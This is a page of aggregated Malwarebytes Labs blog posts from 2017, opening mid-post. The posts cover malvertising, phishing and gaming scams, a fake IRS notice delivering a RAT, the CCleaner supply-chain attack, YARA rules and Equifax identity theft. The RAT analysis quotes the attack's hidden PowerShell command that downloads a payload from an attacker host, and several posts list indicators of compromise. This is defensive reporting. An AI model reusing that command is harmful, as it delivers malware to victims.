The same site pictured above was not only monetizing via Coinhive, but they also ran adverts. Clicking anywhere on the page – including the ‘Play’ button on the video – triggered a pop under advert that ran through various ad exchanges and resulted in malvertising in almost all instances, leading to tech support scams and several different exploit kit infection chains.

Tech support scams

Tech support scams are one of the most common redirections we see these days. While they do not usually infect your computer, they are still a threat to consider. The most common symptom is referred to as ‘Browlock’ because scammers use code that prevents you from normally closing your browser. The claims are always excessive and designed to scare users about made up infections. Victims that call the posted number for help end up with more computer issues and several hundreds of dollars less in their wallet.

Figure 3: Malvertising leading to tech support scam (Browlock) is triggered when clicking anywhere on the page

Figure 4: Web traffic showing redirection sequence from publisher to tech support scam page

RIG exploit kit

RIG is the most popular exploit kit these days and malvertising is its prime delivery mechanism. Victims are filtered using the same tools that marketers have to profile consumers, and there can be a secondary level of filtering, usually via a gate that performs geolocation checks for example.

Figure 5: RIG EK via malvertising chain

Terror exploit kit

Terror EK is on a much smaller distribution scale than RIG but is still a fairly active exploit kit that tries out different things. For instance, some Terror EK infection chains use SSL encryption (via free certificates from Let’s Encrypt). It also has an interesting gate with one of the most convoluted iframe encodings we have seen.

Figure 6: Terror EK via malvertising, and gate before landing page

Block less or more?

One of the first reactions to the rise of browser cryptominers was to ask how to block them, whether with a typical ad blocker or URL/IP blacklist and even by disabling JavaScript. There’s no question that users are annoyed by a rollout that did not include their opinion, even though many were actually favorable to this alternate solution to online ads.

While cryptominers do have an impact on system resources, there was at least a sense that they may be safer and less intrusive than ads. But publishers ought to be more transparent with their audience because no-one likes unannounced guests. Unfortunately, there will always be publishers that care very little about what kind of traffic they push, so long as it generates good revenues; for those, cryptominers are just an added income to their existing advertising portfolio.

Malwarebytes users are already protected against this drive-by mining. In fact, we are blocking over 5 million connection attempts to Coinhive every single day, which shows that browser-based mining has really taken off in a big way.

Our goal is to protect people from unsolicited drive-by cryptomining. However, for those users that are aware and want to participate in mining, they can absolutely do so by adding an exclusion for this domain.

Indicators of compromise Tech support scam 192.241.220[.]40/877microsoft/ RIG EK Fobos: hudsonentertainment[.]info/ Fobos: 204hdchdhhh[.]cf/tako/?re=6128546021 RIG IP: 188.225.83[.]85 43bc543d26f755474b355a70c25077df8ab71836056619216792a112a79bcd3d Terror EK onpakfucli.salary-radar[.]bid/search-w3kpShD3axxD/R5ALkH3JyPBC/rzcp4YrhDgzu.html wabusfqdty.salary-radar[.]bid/search-w3kpShD3axxD/iqW1OavoNisD.php 4fccf7246b6807e22c42dd93507592cca0594694f4487b03db04ef13e7a99c54

The post Drive-by mining and ads: The Wild Wild West appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 18 – September 24)

Malwarebytes - Mon, 09/25/2017 - 16:24

Last week, we kept you updated on our blog about the infected versions of CCleaner that were offered as downloads on the official servers.

We also warned you against a fake IRS notice that delivers a customized spying tool, some of the threats currently facing gamers, and a Netflix scam that has been doing the rounds in Europe.

Mac users learned how to tell if their Mac is infected and Advanced Tech Support victims learned how to apply for a (partial) refund.


Consumer news Business news


Stay safe!

Malwarebytes Labs Team

The post A week in security (September 18 – September 24) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Netflix scam warning

Malwarebytes - Fri, 09/22/2017 - 17:32
Always be on your toes

While we are used to receiving scam attempts pretending to be from banks, online shops, credit card companies, and international courier services that does not mean all the other emails are safe. Far from it. To demonstrate this point we will show you a scam aimed at Netflix customers which has been used in the Netherlands and is now doing the rounds in the UK but could just as easily spread to the US.

The mail in question

The sender address, in this case, was supportnetflix@checkinformation[.]com and the content of the email informs us that there has been a problem with our last payment. Obviously to those of us who are not customers of Netflix this is the first red flag. The fact that the domain name checkinformation[.]com does not belong to Netflix is another big red flag. In fact, the domain is for sale at the moment of writing.


Account disabled!

Dear User,

We’re having some trouble with your current billing information. We’ll try again. But in the meantime you may want to update your payment details. During the next login process, you will be required to provide some informations like (billing info, phone number, payment info)


So the email asks us to fill out our payment details on a site. This should always be a red flag for everyone. A security-aware company does not provide you with a clickable button to their site. They will tell you to log into their site and provide you with instructions on how to proceed. They will not provide a direct link to a page with a form to fill out asking for billing information and what not.

Pay attention to

When you have to provide such details always look for the green padlock in the address bar of your browser.

Remember that the green padlock is not the sole condition, but it is a must before you proceed.

Another telltale sign is spelling errors, but again, the lack of them is not a definite green light to proceed. Scammers have learned that their efficiency goes up if they pay attention to their spelling.

Also never judge a site by its looks, because phishers are masters in the art of copying the layout and images from legitimate sites. In fact, they usually link to the actual layout and images of the website they are pretending to be.


The Guardian: Watch out for Netflix email scam that looks like the real deal

In January another Netflix scam was analyzed by FireEye.

Guideline to help determine whether a website is legitimate.


Pieter Arntz

The post Netflix scam warning appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Don’t let these gaming threats give you a Game Over

Malwarebytes - Thu, 09/21/2017 - 20:24

With EGX, the biggest gaming event in the UK opening its doors today, we thought it’d be timely to remind you of some of the threats currently facing gamers. No matter what type of game, client, or system you use, there’s always something waiting to try and give you a bad day where the safety of your account is concerned.

GTAV cash generators

Some games, like GTAV, involve an amount of “grinding” (performing potentially repetitive tasks) to get what you want. In this case, incredibly expensive items/additional content which are free to download, but cost in-game money to make use of. In GTAV, you can buy in-game currency with real money to speed up the process, grind, or turn to the internet in search of free money tools. While modders in game sessions can – and do – spawn money from the sky, or only add cash to your account, the huge pile of YouTube videos and web comments claiming to offer free services online are all fake. The so-called money generators are merely survey scams, which lead to requests for personal information or downloadable files (which may or may not be malicious).

Steam scams

These are very popular, especially with accounts being able to buy and sell (expensive) digital items for various titles, adding extra desirability to scammers wanting to make a quick buck. Phishing is a mainstay of Steam scams; other attacks, such as swiping a Steam SSFN file to bypass Steam Guard are much more sophisticated. Be wary of fake item trades, especially if they don’t lead to an official Steam URL – you may well be looking at a static phishing page, or one which scrapes some elements from the real thing to appear legitimate.

Read: Something’s phishy: How to detect phishing attempts


The act of sending armed law enforcement round to a game streamer’s house, which could potentially be fatal. Streamers usually get caught by this by being too open with their personal information – quite often, you’ll find out all you need to know about your target simply by listening to them stream. Before you know it, they’ll have casually mentioned locations, even nearby streets where their friends live, and much more besides. Calls to said friends pretending to be someone else, for example, will fill in the missing pieces of the puzzle.

Ironically, the main way to avoid swatting (for the most part) is to tell people who make a living out of talking, to stop talking about themselves (just a little bit). This is no guarantee of safety; many other ways exist to obtain a home address via publicly available information. All in all, Streaming is a bit of a dangerous past-time.

Game company hacks

There’s not a huge amount you can do when the gatekeepers of your data get popped, but that doesn’t mean you should be complacent. Many game companies and hardware makers now offer additional forms of security such as key fobs and two-factor authentication, which you should make use of whenever possible. You may also wish to use a password manager to ensure you’re not just reusing the same passwords everywhere, which could lead to additional compromises. Modern gaming can require multiple passwords across different gaming platforms just to play one game, so it’s fairly common to see video game password burnout – don’t fall for it!

Fake emulators

It’s becoming increasingly difficult to obtain old game consoles, much less play the original titles. Even on consoles where backwards compatibility exists, titles differ from how they were originally, or licensed music has been replaced, or the control scheme is different, or maybe it works on this console but not that mobile properly, and anyway its funded by ads, and so on.

Entering stage left: fake emulators. It is still challenging to emulate most of the last generation (or two) of consoles, and you should be extremely wary where such claims are concerned.

These are some of the most common problems we see on a daily basis in gaming land; feel free to offer up some of the scams you’ve seen doing the rounds in the comments below. Safe gaming!


The Malwarebytes Labs Team

The post Don’t let these gaming threats give you a Game Over appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Fake IRS notice delivers customized spying tool

Malwarebytes - Thu, 09/21/2017 - 15:00

While macro-based documents and scripts make up for the majority of malspam attacks these days, we also see some campaigns that leverage documents embedded with exploits. Case in point, we came across a malicious Microsoft Office file disguised as a CP2000 notice. The Internal Revenue Service (IRS) usually mails out this letter to taxpayers when information is incorrectly reported on a previous return.

Victims that fall for the scam will infect themselves with a custom Remote Administration Tool. A RAT can be utilized for legitimate purposes, for example by a system administrator, but it can also be used without a user’s consent or knowledge to remotely control their machine, view and delete files or deploy a keylogger to silently capture keystrokes.

In this blog post, we will review this exploit’s delivery mechanism and take a look at the remote tool it deploys.


The malicious document is hosted on a remote server and users are most likely enticed to open it via a link from a phishing email. The file contains an OLE2 embedded link object which retrieves a malicious HTA script from a remote server and executes it. In turn, it downloads the final payload, all with very little user interaction required since it is using CVE-2017-0199, first uncovered in April 2017 as a zero-day.


The embedded link points to an HTA script hosted under an unexpected location – a Norwegian company’s compromised FTP server – which invokes PowerShell to download and execute the actual malware payload.

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient) .DownloadFile('http://82.211.30[.]108/css/intelgfx.exe', 'C:\Users\[username]\AppData\Roaming\62962.exe'); Payload

The downloaded payload (intelgfx.exe) extracts to several components into a local folder and achieves persistence using a decoy shortcut. The VBS scripts ensure that the main module runs without showing its GUI, in order to remain invisible to the victim.

RMS agent stands for Remote Manipulator System and is a remote control application made by a Russian company. It appears that in this case, the attackers took the original program (as pictured below) and slightly customized it, not to mention the fact that they are using it for nefarious purposes, namely spying on their victims.

Its source code shows the debugging path information and name that they gave to the module.

Office exploits and RATs

This is not the first time that CVE-2017-0199 is used to distribute a RAT. Last August, TrendMicro described an attack where the same exploit was adapted for PowerPoint and used to deliver the REMCOS RAT. It also shows that threat actors often repackage existing toolkits – which can be legitimate – and turn them into full-fledged spying applications.

We reported the compromised FTP server to its owner. Malwarebytes users were already protected against CVE-2017-0199 as well as its payload which is detected as Backdoor.Bot.

Thanks to @hasherezade for help with payload analysis.

Indicators of compromise

Word doc CVE-2017-0199

82.211.30[.]108/css/CP2000IRS.doc 47ee31f74b6063fab028111e2be6b3c2ddab91d48a98523982e845f9356979c1

HTA script

ftp://lindrupmartinsen[.]no:21/httpdocs/test/template.hta d01b6d9507429df065b9b823e763a043aa38b722419d35f29a587c893b3008a5

Main package (intelgfx.exe)

82.211.30[.]108/css/intelgfx.exe 924aa03c953201f303e47ddc4825b86abb142edb6c5f82f53205b6c0c61d82c8

RAT module


Other IOCs from same distribution server

82.211.30[.]108/estate.xml 82.211.30[.]108/css/qbks.exe

The post Fake IRS notice delivers customized spying tool appeared first on Malwarebytes Labs.

Categories: Techie Feeds

FTC providing partial refunds for Advanced Tech Support victims

Malwarebytes - Wed, 09/20/2017 - 15:00

Last month, the FTC announced the recovery of 10 million dollars from Advanced Tech Support, one of the most successful US-based tech support scammers ever. This money will be put towards partial refunds for victims of ATS who purchased products or services from them between April 2012 and November 2014. Per the FTC announcement, the deadline for a refund is October 27. To repeat:

The deadline for a refund application is October 27.

Restitution from Advanced Tech Support is notable because most scams based in the United States structure their finances such that only a small core of founders ever see a significant profit. These founders then tend to spend most of their money on extravagant parties, vacations, and other ostentatious displays of wealth – leaving very little to recover. Due to these factors, it’s noteworthy that the FTC was able to recover any significant amount of money at all.

Advanced Tech Support, otherwise known as Inbound Call Experts, has had a lengthy history with Florida law enforcement and the FTC. Check out their case history here, where you can follow the long road it took to bring this company to justice.  And remember:

The deadline for a refund application is October 27.

The post FTC providing partial refunds for Advanced Tech Support victims appeared first on Malwarebytes Labs.

Categories: Techie Feeds

How to tell if your Mac is infected

Malwarebytes - Tue, 09/19/2017 - 15:00

There are a lot of reasons Mac users don’t sweat getting infected. One: They’ve got a built-in anti-malware system called XProtect that does a decent job of catching known malware. Two: Macs are not plagued by a high number of attacks. (Most cybercriminals are focused on infecting PCs.) And three: There’s just not a lot of Mac malware out there.

But that’s changing, and fast: Mac malware has increased by 230 percent in the last year alone. Most Mac users don’t know this, and assume their Mac is fine. For those folks we have one word: adware.

Your Mac is infected…with adware

Adware is software that’s designed to display advertisements, usually within a web browser. Most people don’t willingly download programs whose sole purpose is to bombard you with ads, so adware has to sneak its way onto your Mac. It either disguises itself as legitimate or piggybacks on another program in order to be installed.

Once in your system, adware changes the way your browser behaves by injecting ads into web pages, causing pop-up windows or tabs to open, and changing your homepage or search engine—all in the name of funneling advertising dollars away from companies who pay for online ads and into their own accounts.

Your Mac is infected…and not protected

Sounds pretty shady, right? So why doesn’t the Mac anti-malware program catch these guys? Typically, the makers of adware are hiding in plain sight, operating as actual corporations who claim to sell software on the level. They get away with it because their adware is often hidden in the fine print of a long installation agreement that most people skip over. Is it technically legal? Yes. You accepted the terms of the installment so they can spam you all they want. But is it right? So far, Apple hasn’t stepped in to crack down on it. But if you ask us, the answer is an emphatic “no.”

In addition to adware, other potentially unwanted programs, such as so-called “legitimate” keyloggers, scammy “cleaning” apps, and faux antivirus programs that don’t actually detect anything are skirting the Mac protections in place. (Because XProtect doesn’t detect and block adware or potentially unwanted programs—only malware that it has seen before.) So if a new form of malware makes its way onto your computer before Apple has a chance to learn about it and write code to protect against it, then you’re out of luck.

So if you ask us, it’s time to start taking a closer look at your Mac. Is it acting the way your sturdy, reliable Mac has always behaved? Or is it exhibiting classic signs of guilt? If something seems a little off, you just might have a problem. Let’s take a look at the telltale signs that your Mac is infected.

Signs of adware

Advertisements are displayed in places they shouldn’t be, literally popping up everywhere. Your web browser’s homepage has been mysteriously changed without your permission. Web pages that you typically visit are not displaying properly, and when you click on a website link, you get redirected to an entirely different site. In fact, even your search engine has been replaced with a different one. If your web browser, search engine, or websites are acting in funky, unpleasant ways, you’ve likely got yourself an adware infection.

Signs of PUPs

Maybe you downloaded a new program to monitor your family’s behavior online. All of a sudden, new icons are appearing on your desktop for software you don’t remember installing. New toolbars, extensions, or plugins are added to your browser. A pop-up appears telling you your Mac may be infected, and you need to install the latest antivirus immediately to get rid of it. Frightened, you do so, and now your computer has turned the corner from automatically installing apps to slowing to a crawl. What’s going on? These are PUPs, and your Mac’s anti-malware system is not going to get rid of them.

Signs of malware

Mac malware making its way onto your system is, right now, relatively rare. But if it does, you may look out for similar behavior as an infected Windows operating system: your computer’s processing power seems diminished, software programs are sluggish, your browser redirects or is unresponsive, or your ole-reliable starts crashing regularly.

In some cases, you may not be aware of an infection at all. While your computer hums along, info stealers operate quietly in the background, stealing your data for an attack on your bank accounts or identity.

And in the worst case scenario, your Mac can even be infected with ransomware. In March 2016, the first Mac ransomware was spotted, and it was downloaded by thousands of users before Apple had a chance to shut it down. A ransomware attack would be quite obvious to Mac users. Files would be encrypted and cybercriminals would deliver a ransom demand (usually via pop-up) in order to return your data.

Do any of these scenarios sound familiar to you? If so, there are a few steps you can take to remedy the infection. First, back up your files. Next, download a (legitimate) anti-malware program such as Malwarebytes for Mac that’s designed to search and destroy adware, PUPs, and any new forms of malware lurking on the scene. Run a scan and, if there are any nasties hiding away in your pristine Mac OS, it’ll bag, tag, and dump them for you. Then you can finally get your Mac back.

The post How to tell if your Mac is infected appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (September 11 – September 17)

Malwarebytes - Mon, 09/18/2017 - 22:10

Last week, we dug into phishing campaigns done via Linkedin accounts, remediation versus prevention, issues with smart syringe pumps, and advised you to go patch against a Word 0day. We had some tips regarding identity theft protection, explored crowdsourced fraud, and explained YARA rules.


Consumer News

Stay safe!

Malwarebytes Labs Team

The post A week in security (September 11 – September 17) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Infected CCleaner downloads from official servers

Malwarebytes - Mon, 09/18/2017 - 15:31

In a supply chain attack that may be unprecedented in the number of downloads, servers hosting CCleaner, a popular tool for cleaning up the PC, has been delivering a version of the said software with malware.

What happened?

Threat actors have managed to change the files that were being delivered by Avast servers hosting CCleaner updates. In case you are wondering why they were on those servers, Avast acquired Piriform, the original publishers of CCleaner, a few months ago.

The incident was discovered and reported by Talos. Piriform is aware of the situation and is acting to prevent further damage. They are also investigating how the files coming from their servers were modified before being released to the public.

Possible impact

It is difficult to say at this moment how many users might have been affected, but the numbers could be huge. From the statistics brought out by Piriform, CCleaner has been downloaded 2 billion times in total, 5 million times every week. The modified version, 5.33, is made available from August 15 until September 12 when version 5.34 was released. In a press statement the company estimates that 2.27 million people used the affected software.

The malware

The malware collects the following information about the infected system:

  • Computer name
  • A list of installed software, including Windows updates
  • A list of the currently running processes
  • The MAC addresses of the first three network adapters
  • Other system information that is relevant for the malware like admin privileges, whether it is a 64-bit system, etc.

The malware uses a hardcoded C2 server and a domain generating algorithm (DGA) as a backup, to send information about the affected system and fetch the final payload.

What to do if you think you are affected?

First of all, check the version of CCleaner on your system. If you suspect you may have downloaded CCleaner version 5.33.6162 or CCleaner Cloud version 1.07.3191, scan your system for malware.


CCleaner users that are running older versions or that do not trust the one they are using now are encouraged to update their CCleaner software to version 5.34 or higher. The latest version is available for download here.

Affected versions: CCleaner version 5.33.6162 and CCleaner Cloud version 1.07.3191

Malwarebytes blocks the IP and domains related to this malware. We also remove the malicious installer.

Stay safe!


Pieter Arntz

The post Infected CCleaner downloads from official servers appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Explained: YARA rules

Malwarebytes - Fri, 09/15/2017 - 15:00

YARA rules are a way of identifying malware (or other files) by creating rules that look for certain characteristics. YARA was originally developed by Victor Alvarez of Virustotal and is mainly used in malware research and detection. It was developed with the idea to describe patterns that identify particular strains or entire families of malware.


Each rule has to start with the word rule, followed by the name or identifier. The identifier can contain any alphanumeric character and the underscore character, but the first character is not allowed to be a digit. There is a list of YARA keywords that are not allowed to be used as an identifier because they have a predefined meaning.


Rules are composed of several sections. The condition section is the only one that is required. This section specifies when the rule result is true for the object (file) that is under investigation. It contains a Boolean expression that determines the result. Conditions are by design Boolean expressions and can contain all the usual logical and relational operators. You can also include another rule as part of your conditions.


To give the condition section a meaning you will also need a strings section. The strings sections is where you can define the strings that will be looked for in the file. Let’s look at an easy example.

rule vendor
$text_string1 = “Vendor name” wide
$text_string2 = “Alias name” wide
$text_string1 or $wide_string2

The rule shown above is named vendor and looks for the strings “Vendor name” and “Alias name”. If either of those strings is found, then the result of the rule is true.

There are several types of strings you can look for:

  • Hexadecimal, in combination with wild-cards, jumps, and alternatives.
  • Text strings, with modifiers: nocase, fullword, wide, and ascii.
  • Regular expressions, with the same modifiers as text strings.

There are many more advanced conditions you can use, but they are outside the scope of this post. If you would like to know more you can find it in the YARA documentation.


Metadata can be added to help identify the files that were picked up by a certain rule. The metadata identifiers are always followed by an equal sign and the set value. The assigned values can be strings, integers, or a Boolean value. Note that identifier/value pairs defined in the metadata section can’t be used in the condition section, their only purpose is to store additional information about the rule.


YARA is a tool that can be used to identify files that meet certain conditions. It is mainly in use by security researchers to classify malware.


Signature-Based Detection With YARA

Latest YARA documentation

YARA: Simple and Effective Way of Dissecting Malware

Screenshots were made using Yara Editor by Adlice Software

Pieter Arntz

The post Explained: YARA rules appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Crowdsourced fraud and kickstarted scams

Malwarebytes - Thu, 09/14/2017 - 16:00

Crowdsourced funding opportunities via Kickstarter, Patreon, and GoFundMe have removed many structural roadblocks for people to access capital quickly and conveniently. But they’ve also lowered the barrier to entry for many very old scams. So how do you tell the difference between a great cause or project to contribute to and a digital confidence scam? What’s outright fraudulent, and what’s just a company with poor organizational skills? Let us take a look at pitfalls on two crowdfunding platforms.

GoFundMe primarily serves personal projects and donation pages, or other campaigns that otherwise don’t fit the more common commercial model found on Kickstarter. Funding requests cover a wide range of needs, from community sports groups to disaster relief, to education and medical care (for US users). It sounds like a great use of crowdfunding, but when it comes to fraud, things start to get a little iffy. Here’s what GoFundMe’s terms of service (ToS) have to say about its giving campaigns.

GoFundMe has no control over the conduct of, or any information provided by, a Campaign Organizer or a Charity, and GoFundMe hereby disclaims all liability in this regard to the fullest extent permitted by applicable law.

So as far as they’re concerned, buyer beware. But as a platform, they do have some minimal obligations, as well as some additional rules to not run afoul of some onerous regulations. To summarize their ToS, here’s what you can’t raise money for:

  • Drugs
  • Weapons
  • Any financial product
  • Gambling
  • Hate speech
  • Porn
  • Legal defense
  • Fraud

But wait a minute – how can fraud be on the list if they say they won’t vet campaigns? Because these categories largely are about liability and are included to absolve the platform of after-the-fact responsibility. The first four categories can place GoFundMe under regulatory scrutiny, however, and are most likely patrolled by counter-fraud algorithms. If you’d like to know what GoFundMe considers fraud, you can go to their page on the subject, which oddly does not say anything on the matter. They do have a fraud report form, but it requires proof of intentional deception on the part of the organizer. You can go to for examples of how difficult that is.


Kickstarter does a little bit better regarding fraud, requiring that the creators have an actual production plan and prototype to show backers, and prohibits an extensive list of backer rewards. Most important is the list of creator requirements, in particular:

You [must] have an address, bank account, and government-issued ID based in the country that you’re creating a project in.**

This single requirement raises the barrier to entry for most scammers and gives Kickstarter tools to track and permanently deal with scams that make it into the platform. Further, they claim to vet projects to make sure they meet with company guidelines before they go live. This is great for the vast majority of online scams that are blatantly fraudulent. Their track record on projects whose vetting require domain expertise is considerably worse.

SecuritySnakeOil.Org  is a site devoted to scammy information security projects on Kickstarter. Most of the projects on review combine open source hardware or software, expansive marketing claims, and entry level security flaws. From “unhackable” routers made from a Raspberry Pi running a years old build of Debian, to products that advertise “A custom operative system (OS) to avoid hacking”, what most of these share is an inability to vet them properly with a lack of domain expertise. That is, if you don’t know anything about the field, you would have difficulty evaluating their marketing claims, and the project creators don’t do a lot to help.

Even more legitimate projects, such as this Wi-Fi router with a built in VPN that blocks ads at the perimeter (Neat!), provides no details about any specific technology used in the product. So without adequate, accessible information on what you’re backing, how can you possibly make a safe choice?

What to do about it

Both GoFundMe and Kickstarter offer organizers the ability to link their Facebook account to their pitch. For GoFundMe, this allows you to see if the organizer is, in fact, someone connected to the cause and in a reasonable position to get the funds to the right place. For Kickstarter, Facebook can provide a name to look up an organizer’s employment history (or lack thereof.) But a better question to ask for a project involving an actual product would be this: Are the owner’s claims physically possible?

And lastly, the question that has protected people from fraud for time immemorial: Is this too good to be true?

The post Crowdsourced fraud and kickstarted scams appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Equifax aftermath: How to protect against identity theft

Malwarebytes - Thu, 09/14/2017 - 15:00

Who here is scrambling around in the aftermath of the recent breach at Equifax to figure out if you’ve been compromised? Who here is wondering what to do about it if you are? If you’re one of the 143 million Americans whose data was accessed by cybercriminals, then you probably raised your hand.

Even if you weren’t one of the 143 million, you might still want to take some precautions. You could instead be part of the millions of folks who’ve had their data stolen over the course of online history. Basically, if you have a social security number, have ever run a credit check, or have a pulse, you should listen up. Why? Two words: identity theft.

What could happen?

The Equifax breach gave criminals access to vital personal information, including names, social security numbers, birthdates, addresses, and in some cases, driver’s license IDs and credit card numbers. And here’s just a slice of what those jerks can do with that data:

  • Open financial accounts
  • Apply for credit cards, mortgages, and other financial services
  • Get medical care at your expense
  • File for a tax refund in your name
  • Get a job in your name and let you pay the taxes
  • Steal your benefits
  • All of the above (aka, identity theft)
Who is impacted?

The better question might be, who isn’t? Don’t worry about verifying if your data was stolen—assume it was stolen. This is a decent rule of thumb even before the Equifax breach, but even if that thought never crossed your mind, it’s pretty impossible to verify whether you’ve been impacted at the moment.

The Equifax verification site is currently not returning accurate information. And if you try calling the company now, you might be met with some long waiting times to receive frustratingly vague answers. So if you want to act quickly (and we recommend you do), just bypass the first four stages of grief and go directly to acceptance.

What we do know: Those affected by the breach are predominantly from the US, but there are people from Canada and the UK impacted as well. Some methods that work in one country may not work in others, so please keep in mind that this article is aimed at our US readers. International readers can find some additional information about what to do here.

Steps to protect yourself

Our recommendation is to freeze your credit immediately with all three of the major credit bureaus. By freezing your credit, you’ll prevent criminals from trying to open up new accounts in your name—all of your current credit cards will still work. You’ll only need to consider unfreezing your credit if you want to apply for a loan, open a new credit card, or make any type of purchase that requires a check on your credit.

Three things you’ll want to know before contacting the credit bureaus.

One: You’ll want to pull a credit report. You can get a free report here. It doesn’t matter if you’ve already frozen your accounts, you can still monitor using the free tool. We recommend you pull only one report now, another one in four months, and the third in another four months. It’s not foolproof, but it will allow you to see different reports throughout the year to track any potential changes.

Two: the cost is minimal. While reports have varied—Equifax is offering their credit freeze for free, but it’s pretty hard to get through to them—freezing credit usually only costs a one-time fee of $10 per bureau. That’s 20 or 30 bucks for a whole lot of peace of mind.

Three: You must set or receive PINs when freezing your credit. Save these in a secure location, whether that’s using a password manager or physically storing the printed PIN paper someplace safe and out of sight.

Where to go to freeze your credit Additional monitoring services

The use of additional monitoring services is entirely up to you. The biggest issue is that both legitimate companies trying to help and scammer companies trying to trick will over-hype the danger of identity theft in order to make a sale. Please make sure that you do your homework and research on these companies before signing up blindly out of fear.

When looking up information about how to protect yourself in situations like these, look to sites like the Federal Trade Commission or other technology publications such as Wired, The Verge, or Vice’s Motherboard, as they won’t be trying to upsell you to credit protection you may or may not need. The wrong company might actually hurt your ability to stave off ID theft.

General best practices

We wish we could say that the above advice is going to save you from all the dangers associated with this breach. For credit theft, you are covered, but for all the other threats associated with scammers or fraudsters looking to capitalize on this situation, here are some additional guides on how to avoid their traps.


Be on the alert for credit scams or any related terms. You’ll see these in emails, ads on social sites or games, and even physical mail to your home. These attacks are part of what we refer to as social engineering, and they will run rampant for many months and years to come. Always be skeptical, and if you’re not sure about something, ask a professional.

Phone or text scams

Since your data was most likely taken, that means your numbers will be shared even more than they already are today. Calls and texts from unknown numbers, numbers with similar area codes, or numbers very similar to yours should be treated as potential scams.

You might think that the National Do Not Call Registry would protect you from this. Sadly, it does not. It offers protection from legit companies trying to solicit your business. It does not offer protection against scammers. (Because why would criminals follow the law, anyway?)

my Social Security account

The my Social Security account allows you to keep track of the social security funds you’ll be collecting in the future. Although it was not affected by the Equifax breach, it’s good practice to get this account set up in your name, as someone else could easily grab it and you’d be locked out of your future payments. One caveat: If you want to set up this account, you’ll need to do it before you freeze your credit. (Otherwise they can’t confirm your identity through the account.)

Passwords and two-factor authentication

Ensure you’re using smart password strategy (complex, do not repeat them, do not use the same one across multiple sites/services, etc.) and if available, enable two-factor authentication (2FA) on every account possible. You can check the 2FA availability on your sites and services here.

Enable alerts on your accounts

While your current accounts shouldn’t be impacted by this breach, it’s never a bad idea to keep an eye on your bank accounts and credit cards for larger purchases. For accounts rarely used, you could set alerts to $1 so you’re notified the second any transaction happens. For regular accounts, set the alerts to a dollar amount that would seem out of place for that card, whether it’s $20 or $500.

New phone accounts

A common attack vector with credit/personal data breaches is to purchase new phone accounts through your provider, with your account! Once criminals have your info, they’ll call up the phone company and say they want to add a new line but don’t have a PIN number. If you haven’t set up a PIN number with your phone company already, they have no way to verify your account. So guess what? BAM! There’s a new phone on your bill. In order to protect yourself from this type of attack, go ahead and set up a PIN with your provider.


File these as soon as possible next year! For multiple years we’ve heard about victims of tax return fraud, wherein a scammer using your personal information files YOUR return before you can. So don’t wait on this one.


If you’re affected by the Equifax breach, you have a heightened risk of becoming a victim of identity theft. But at this juncture, the point is moot. Since it’s difficult to discover a definitive answer, it’s best to assume you are and deal with the fallout.

We’ve given you some direction on what to do to avoid identity theft and credit fraud, and we hope you take a deep breath, crack your neck, and get to work nailing your personal info down. One new credit card created by an attacker in your name is going to cause a massive headache. Better to stay ahead of it than spend the next month trying to convince a bank that you didn’t open an account. Good luck, be vigilant and stay safe.


The Malwarebytes Labs team

The post Equifax aftermath: How to protect against identity theft appeared first on Malwarebytes Labs.

Categories: Techie Feeds


Subscribe to Furiously Eclectic People aggregator - Techie Feeds